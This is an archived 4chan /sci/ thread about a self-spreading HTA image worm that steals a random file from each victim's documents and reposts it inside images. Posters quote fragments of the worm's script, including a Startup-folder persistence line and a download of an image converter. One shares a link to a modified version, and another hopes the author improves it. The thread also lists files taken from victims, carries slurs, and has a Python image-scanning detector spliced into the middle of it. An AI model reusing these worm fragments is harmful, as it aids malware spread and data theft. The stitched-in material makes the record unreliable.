
/sci/ - Science & Math



File: 45 KB, 468x576, arrogance.jpg
No.1447428

Anyone got his computer screwed already ???


http://en.wikipedia.org/wiki/HTML_Application

An HTA executes without the constraints of the internet browser security model; in fact, it executes as a "fully trusted" application.

An HTA is treated like any executable file with extension .exe. When executed via mshta.exe (or the file icon is double-clicked), it runs immediately. When executed via the browser, the user is asked once, before the HTA is downloaded, whether or not to save or run the application; if saved, it can simply be run on demand after that.

>> No.1447439
File: 3 KB, 118x126, 1272618766045.jpg

>implying anyone is stupid enough to download shit and run it as html applications

>> No.1447457
File: 22 KB, 207x167, hta.png

>> No.1447467
File: 1.42 MB, 400x350, 1272287815668.jpg

Hey /sci/

So a few weeks ago fI ell over and got a semi bad cut on my knee.

Now why isi t thatI feel the urge to take the scab off all the time. Shouldn't I awnt it t ostay there psychologically?

>> No.1447480
File: 28 KB, 400x400, laughing woman.jpg

>>1447439
You greatly overestimate internet users

>> No.1447483

>people on fucking /sci/, of all goddamn places, getting raped by this sort of bullshit

Where the fuck did you people leave your fucking logic.
Don't run shit you see on 4chan, you fucking cunts.
You goddamn deserve this shit.

>> No.1447501
File: 743 KB, 2036x4500, epic206.jpg

Pic somewhat related

>> No.1447503

1. Go on 4chan
2. Someone tells you to do something with your computer that you do not even slightly understand (AND uses the words "Shit bricks")
3. Sounds legit, do it.

Anyone who follows that pattern deserves to get their PCs CRUSHED, not used as a botnet.

>> No.1447509
File: 58 KB, 750x600, this-kid-is-awesome.jpg

"It's copying old posts and the pictures in them, adding the code to the pic and then reposts the result in random threads."


WAHAHA THAT'S A HELL OF A FUNNY 4CHAN VIRUS...

>> No.1447511

>>1447503
>Anyone who follows that pattern deserves to get their skulls CRUSHED.
-fix'd

>> No.1447512
File: 408 KB, 450x548, 1274923172826.jpg

Is homosexuality really natural? Or a genetic dysfunction (much like almost birth-related biological function)?

I'm fine with either answer as long as it's a constructive and well-rounded arguemnt.

>> No.1447522

>Developed by Microsoft
fucking microsoft

>> No.1447530

Everybody is retarded.

>> No.1447538
File: 290 KB, 164x152, 1273502891043.jpg

>my face when people still believe in global warming

>> No.1447539

Are we getting haxed?

>> No.1447546
File: 24 KB, 298x393, 1270481941907.jpg

HEY, HEY GUYS

LOOK AT MY IMAGE

DO YOU SEE WHAT IT DOESN'T HAVE?

YEAH, THAT'S BECAUSE I'M NOT A RETARD.

ENJOY YOUR MENTAL DISABILITIES AND AIDS

>> No.1447573
File: 115 KB, 789x791, Smile-zwinkernd.gif

>>1447546
A matter of minutes until this post is copied and guarantees some funnies

>> No.1447591
File: 3 KB, 113x126, 1272618598384.jpg

>>1447501
>implying it is not a troll on the pic

>> No.1447593
File: 61 KB, 800x529, 1258088521833.jpg

>>1447573
can your shit copy goddamn trips, nigger?

OH LOOK, I CAN NOT BE COPIED :D
That is, unless it just ignores the trip.

>> No.1447595

>>1447428
What the fuck? That vulnerability... it just sounds so fucking easy to "hack" into anyone's computer.

You can't fucking be serious...

The possibilities are endless with that shit. I am so abusing it from now on to fuck around with friends.

>> No.1447602
File: 85 KB, 450x242, 1279042204944.jpg

I modified the script.

Basically it causes the script to post something that will get the user who used the script banned.

Here's the pastebin:

http://pastebin.com/Usdjspf0

Do what you want with it.

>> No.1447607

>>1447480
Fuck you, I hate you.

>> No.1447616
File: 33 KB, 438x372, d'hoho.jpg

>>1447593
>mfw you don't even remotely know how it works

>> No.1447659

>>1447595

That's more social engineering than hacking. It's not an exploit or bug, it's getting the user to do something stupid.

>> No.1447678
File: 507 KB, 1024x768, 1270871187105.jpg

>>1421337
This.

>> No.1447681
File: 715 KB, 800x600, 1273648292129.jpg

Check out this shit bros.

Pic related: Check it out.

>> No.1447696

Somebody explain how this virus works/what it does, my curiosity has been piqued.

>> No.1447705

>>1447696
And by how it works, I mean how it attacks your system. I obviously know how it gets on to the computer thanks to OP's post.

>> No.1447706

If you fell for this then you deserve it. Fucking retard.

>> No.1447711

anyone else notice that nearly all these idiots that executed the file are foreign (not english/murican)?

>> No.1447737

>>1447696

hta files run with full access to your system, so they can do whatever the fuck they want.

This downloads a random image from 4chan, downloads an image converter, uses the converter to add the instruction tag to the top left of the image, inserts itself into the image so it can be run again, then it steals a random file from your documents folder and embeds it in the image before re-uploading it to a random board on 4chan.

All I can say after seeing the kinds of documents this worm carries along, is that most of the people that get infected are subhuman trash.

>> No.1447765
File: 55 KB, 473x425, 1257542930397.jpg

>>1447737
Total
Agreement

Also, it takes random documents?

Does that mean that one of them COULD contain shit like passwords and shit?

>> No.1447784
File: 371 KB, 495x348, 1269763939982.jpg

I think its because Radio Communication is Ghetto.

Perhaps in 50 years we will have a new form of communication that use slike quantum entanglement or some crazy shi.t Thus prodcast of radio singles only last a century ro so at most. So perhaps tehres lot sof alien civilizations out there, they just arent using radio waves, and thats what were listening for.

>> No.1447817

You're an idiot for falling for it.

>> No.1447827
File: 3 KB, 400x400, 21mybl0.gif

>>1447428

>> No.1447848

SCIEEENCE
- It chooses a random board
- It chooses a random thread from that board
- It chooses a random post+image from that thread
- It downloads the text and image of that post
- It downloads a graphic editing program to your PC
- It uses the program to add the HTA text to the downloaded image
- It adds the 'virus' code to the image's code
- It randomly switches a few letters in the text to make it 'unique'.
- It posts the image+text on the same board it was taken from, in a random thread. This is why the image and text often seem relevant to the board it's posted on.
It's actually pretty clever.

>> No.1447849

>>1447737
Jeremy's Christmas list!!!

1) New USB mouse
2) Left 4 dead 2
3) Call of duty modern warfare 2
4) 2 xbox 360 controllers
5) Roller Blades
6) Bike
7) Money
9) K blade Team (Tennis racquet) + XX Lightning strings (58 lbs tension)
10) A Car?
11) A well-fitted Multi-pocket Vest Thats not poofy
12) Psp accessory kit
14) Wii
15) 4 Wii controllers
16) Mario kart Wii
17) Mario party 8
18) New super mario bros wii
19) Wii sports
20) Wii sports resort
21) Warcraft III battle chest

wtf...

>> No.1447858

>>1447849
ahahaha that's golden.

shit son. when i was a kid i'd get like 2 games and some socks max for xmas. back when it was £40 for a snes game.

>> No.1448031

>>1447765

It could be anything from the documents folder.
I've found way too many fanfics. Way too many oh god.

>> No.1448034

God dammit /sci/, you are the most infected board I bother to visit.

>> No.1448044

>>1448034
You're incredibly wrong.
I frequent about 4 boards and /sci/ is no worse, it's just slower, making the infected threads stay nearer the front page for longer.

>> No.1448055

>>1447593

I bet it can copy trips.

>> No.1448059

>>1447848
Nah, it's dumb as fuck.
For example, the image being uploaded contains both the original image (part4 in the source) and the modified ("Save as...") image (part2 in the source).

Padding is added to make things unique, but the padding is all in one bit and is way too large - There's no point in adding several kilobytes of random alphanumericals (it is limited to those), for detection purposes that just makes it easier.

Also, even though the unmodified image is still included in the upload, if an infected image is chosen the entire infected image is re-infected. This recursive process makes the image grow in size in a linear fashion.

Combined with the multi-kilobyte padding, the images quickly reach the 3072KB size limit, causing the upload to fail.

As the thing cannot detect if the downloaded carrier image is already infected (even though this would be trivial to do), it will not only hit the size limit but in time the flood of infected images will mean that few new images are infected. The result is that the vast majority of images on the board are multi-infected images close to the size limit.
This means that the ratio of infectable images gets lower and lower, until it reaches approximately zero.

tl;dr: The "worm" actually dies out / kills itself due to incompetence on part of the author.
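
The detection point made in the post above (kilobytes of alphanumeric padding plus script text inside an image make such files easy to spot), as an added example that is not part of the thread or of the worm's code. The marker list, the 1024-byte run threshold and the PNG-only trailing-data check are assumptions; the thread does not state the worm's exact file layout.

```python
import re
import struct
import zlib

# Assumed marker list: strings a plain image has no reason to contain.
SCRIPT_MARKERS = (b"<script", b"<hta:application", b"activexobject")
# Assumed threshold: the thread describes several KB of alphanumeric padding.
ALNUM_RUN = re.compile(rb"[A-Za-z0-9]{1024,}")

def png_trailing_bytes(data):
    """Bytes after the IEND chunk, or -1 if data is not a well-formed PNG."""
    if not data.startswith(b"\x89PNG\r\n\x1a\n"):
        return -1
    pos = 8
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length  # length field + type + body + CRC
        if ctype == b"IEND":
            return len(data) - pos if pos <= len(data) else -1
    return -1

def inspect_image(data):
    """Report script markers, padding runs and trailing data in one image."""
    lowered = data.lower()
    markers = [m.decode() for m in SCRIPT_MARKERS if m in lowered]
    longest = max((len(m.group()) for m in ALNUM_RUN.finditer(data)), default=0)
    trailing = png_trailing_bytes(data)
    return {"markers": markers, "longest_alnum_run": longest,
            "png_trailing": trailing,
            "suspicious": bool(markers) or longest > 0 or trailing > 0}

def _chunk(ctype, body):
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

# Constructed samples: a 1x1 grayscale PNG, and the same file with an inert
# placeholder tag plus about 4 KB of alphanumeric padding appended.
CLEAN_PNG = (b"\x89PNG\r\n\x1a\n"
             + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
             + _chunk(b"IDAT", zlib.compress(b"\x00\x00"))
             + _chunk(b"IEND", b""))
APPENDED = b"<SCRIPT>/* constructed placeholder */</SCRIPT>" + b"aB3" * 1366
TAINTED_PNG = CLEAN_PNG + APPENDED

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_PNG), ("tainted", TAINTED_PNG)):
        print(name, inspect_image(blob))
```

The marker and padding checks work on any image format; only the trailing-byte count is PNG-specific, and it returns -1 for other formats.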

>> No.1448065

>>1448034

The worm chooses the board to post on completely at random. Slow boards look like they're hit hardest because there are fewer real posts per worm post.

>>1448055

It's entirely possible to capture your trip from your cookies, but this worm is really dumb and doesn't do anything like that.

>> No.1448068

man its actually kind of tempting

why is this

>> No.1448107

>>1448059
Also, further analysis suggests that a (not yet identified) bug results in most infected images not having the sidechannel data (the file being smuggled out).

A quick survey gives an approximate 70% failure rate where (for whatever reason) no sidechannel data was attached.

Non-complete analysis of the sidechannel data included on /sci/ gives a predictable result: Most of the sidechannel files that make it out are useless.

So far, the following files have been recovered from /sci/ as side channel data (paths have been pruned):

1277020430774.jpg
Carol Edwards Head of Consumer Education.jpg
GFWLIVESetupLogVerbose.txt
jonslight.txt
linkandtriforce.doc
MumbleAutomaticCertificateBackup.p12
Ticketmaster.mdi

Except for "jonslight.txt", none of these files hold any value ("linkandtriforce.doc" is triforce ASCII art).

"jonslight.txt" holds several flight plans from 2009, but offers no personal or otherwise sensitive information, not even a name.

tl;dr: zZzZ

>> No.1448130

>>1448107
>Carol Edwards

Hahaha oh wow:

http://www.consumercouncil.org.uk/education/consumer-profiles/carol-edwards/

>> No.1448133

>>1448107
How do you know all that?

>> No.1448206

>>1448107
>>1448107


There's a couple more files I managed to find as well. One was some shitty essay, english lit or something. Another was some English for foreign people document.

>> No.1448277
File: 155 KB, 512x384, 1174146627291.png

I get the feeling that the aim of the virus is to farm personal info, if it's pulling out random documents. Perhaps the author is hoping to get lucky and pull out something with some sensitive info in it.

>> No.1448281

>>1448107
Interesting stuff.

It's nice to see /sci/ has an intelligent thread about the spam.

>> No.1448326

>>1448107

Most people don't really use their "my documents" folder and the worm will drop out of the document loop without selecting anything if the RNG comes up with a zero, so the high failure rate isn't surprising. Thanks to the algorithm used, that'll happen 100% of the time for 0 or 1 document, or 50% of the time for two documents.

>> No.1448335

>>1448326
There's also a chance the worm will select a directory because it doesn't check if the list entry is a file, and this will cause the insertion operation to fail.

>> No.1448336

>>1448277

If it was smart, it would pull documents out of the most recently opened documents list. Those are the most likely to contain sensitive data.

>> No.1448357
File: 4 KB, 126x126, 1275249553609s.jpg

>>1447848
>>1447849

>> No.1448359

>>1448336
True.

>> No.1448392

>>1448336
I'm a bad person. I hope the author sees this thread and fixes his bad virus.

SCIENCE

>> No.1448490

>>1447467
When I open that shit in notepad, I find stuff like:
WaitForSingleObject GetProcAddress ñLoadLibraryA LFreeLibrary ” CreateProcessA — CreateProcessW ¤HeapReAlloc  HeapDestroy ŸHeapCreate WVirtualFree ¡HeapFree HeapAlloc TVirtualAlloc ©HeapValidate žHeapCompact ªHeapWalk ¦HeapSize ZVirtualProtect

And some random characters. Why is this?

>> No.1448513

>>1448490
Means it grabbed an executable.
Search the file for "c:\" and probably find the path/filename/size.

>> No.1448530

>An HTA executes without the constraints of the internet browser security model; in fact, it executes as a "fully trusted" application.

But GNU/Linux does not ever assume that files have execution permission. Lol windows.

>> No.1448580

>>1448513
Oh yeah, it found the more readable path. It adds some javascript shit to the registry, so when you startup IE it runs:
copyname = shell.regRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup") + "\\4chan.js";
And this was the path C:\Users\TiMpF\Documents\=).txt
Bytes: 150

Lol, and lots of other interesting stuff
// List of boards
var dir = "a b c d e g h hr k m o p r s t u v w wg i ic cm y r9k 3 adv an cgl ck co fa fit int jp lit mu n new po sci sp tg toy trv tv vp x".split(" ");
var mfs = [3,2,3,3,3,3,3, 8,3,3,3,5,8,3,3,3,3,4, 4,3, 3, 3,3, 2,3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3,3, 3, 8, 3, 3, 3, 3, 8, 3, 3,3];

I want to know how this works, this is funny. There are some comments above the scripts roughly telling what it does, probably for the author to make it easier to find. Just, awesome.

>> No.1448601

>>1448580
There may also be more than one file embedded in the image. The worm is really stupid and will re-infect already infected files.

>> No.1448637

>>1448580
>Registry

Wait, so /sci/ actually uses Windows?

>> No.1448648

>>1448637

This isn't /g/. People use whatever works for them.
I use Linux myself but you'd never know it if I hadn't told you.

>> No.1448657

>>1448637
Windows home laptop, Linux uni laptop

problem?

>> No.1448670

>>1448601
Yes I see, there are two scripts inside, both called "thisscript". That's why the bunny with the pancake file is so big. Both parts of the script use imagemagick, and download it. Will these two scripts not interfere with each other?

// Download ImageMagick
var imc;
try {
imc = download("https://develop.participatoryculture.org/trac/democracy/browser/trunk/dtv-binary-kit/imagemagick/convert.exe?rev=4463&format=raw");

And it grabs documents, but what exactly happens to these? I can read some basic script stuff, but not when they get long :P The documents are divided into 5 parts, and then what? Are they sent somewhere? Or added in the picture?

>> No.1448679

>>1448670
It grabs a random document and adds it to the picture.

>> No.1448686

>>1448637
No I use Linux Mint, so I didn't fear to open that script lol And I know there's gEdit on it, but I just prefer Wine-> notepad haha

>> No.1448687

>>1448670
It'll just run the script twice, downloading/altering/attaching file/reuploading two images. Because of this careless behaviour though it's liable to make files too large to upload eventually.